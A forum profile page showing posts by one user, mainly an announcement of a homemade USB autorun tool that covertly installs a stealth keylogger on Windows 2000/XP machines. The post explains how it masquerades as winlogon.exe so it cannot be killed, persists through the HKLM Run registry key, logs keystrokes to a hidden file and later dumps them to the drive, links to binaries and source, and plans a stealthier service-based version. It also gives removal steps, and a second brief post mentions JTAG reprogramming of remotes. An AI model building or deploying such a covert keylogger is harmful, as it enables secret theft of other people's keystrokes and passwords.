davidork
-
Posts
2 -
Joined
-
Last visited
Posts posted by davidork
-
-
Check it out
For non u3 flash drives
Runs on 2k/xp/and possibly vista
plugin the flashdrive, wait for autorun to kick in, click wiretap the computer logs installs a stealth keylogger and logs out.
on the next login the keylogger starts running.
come back later, plugin the flashdrive, wait for autorun to kick in, cilck wiretap again, you get a prompt from pssuspend asking you to agree to a EULA (had to use sysinternals pssuspend to pause the keylogger process, to prevent it from throwing an error when the keyloggers log is dumped) and it dumps the keyloggers log to the flash drive.
for now the log only contains the keystrokes from the current login, but i've got a pretty good idea for the fix, but wont add it until the next release (v 2. 0)
it aint perfect, but it'll get the job done.
you can get the files at hxxp: davidork. googlepages. com/usbwt. zip and the source code at hxxp: davidork. googlepages. com/usbwt-src. zip
Honestly, i dont know if there will be a 2.0 it was just a "lets see if we can pull this off" proof of concept type thing
but if there is another release
plans for 2. 0
installs a system service (instead of a HKLM>software>microsoft>windows>currentversion>run registry entry)
wont require pssuspend to dump logs
will log more than the current login
neater install/dump process
artwork?
but for those of you who are curious as to what this is but dont want to download ill cover the basics of whats going on.
on the first insertion, it checks to see if the keylogger is allready installed
if not, it installs it, by copys the keylogger to c:/windows/winlogon.exe
the naming here is important, it has the same image name as a vital system process thus you cant close it.
it patches itself into the registry to run at start up HKLM>software>microsoft>windows>currentversion>run>c:windowswinlogon.exe
then runs shutdown -l to logout, and on then next login the keylogger kicks in and starts logging to c:windowssetup.dat
on the second insertion, it checks again to see if its installed if it is
it then runs pssuspend to pause the keylogger (to prevent a file in use error)
copies the log off onto the flash drive
then unsuspends the keylogger.
if you download it and try it... heres removal instructions
dont try to kill it with task manager (it wont let you) and you can use a little tool from sysinternals called pskill to kill it, however being that it has the same name as a windows process (winlogon.exe) doing so causes an instant bluescreen.
start>run>type regedit > hit enter > navigate to HKLM>SOFTWARE>MICROSOFT>WINDOWS>CURRENTVERSION> and delete c:windowswinlogon.exe
then logout.
log back in (this effectively kills the keylogger without a bluescreen)
then delete c:windowswinlogon.exe and c:windowssetup.dat
Change a remote controlls frequency
in Hacks & Mods
Posted
Most multifunction remotes can be "haxxored" with a jtag programmer. on most Directv remotes the connectors are under the batteries, and usually have the pins removed so you'll probably have to solder some pins on to be able to use the jtag interface.